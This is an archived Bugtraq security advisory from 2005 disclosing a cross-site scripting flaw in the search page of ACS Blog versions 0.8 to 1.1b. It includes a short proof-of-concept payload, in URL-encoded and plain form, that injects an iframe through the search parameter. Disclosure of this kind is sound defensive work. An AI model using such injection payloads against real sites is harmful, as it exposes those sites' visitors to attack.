lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20050317082401.8600.qmail@www.securityfocus.com> Date: 17 Mar 2005 08:24:01 -0000 From: farhad koosha <farhadkey@...oo.com> To: bugtraq@...urityfocus.com Subject: XSS in ACS blog XSS vulnerability exist in the ACS blog ( ASP WEBLOG SYSTEM ). Vulnerable : ACS Blog v 0.8 ACS Blog v 0.9 ACS Blog v 1.0 ACS Blog v 1.1b Code : /search.asp?search=%22%3Cbr%3E%3Ciframe+src%3D%22http%3A%2F%2Fgoogle.com%22%3E%3C%2Fiframe%3E or goto /search.asp and copy this code : "<br><iframe src="http://google.com"></iframe> Vendor URL : http://www.asppress.com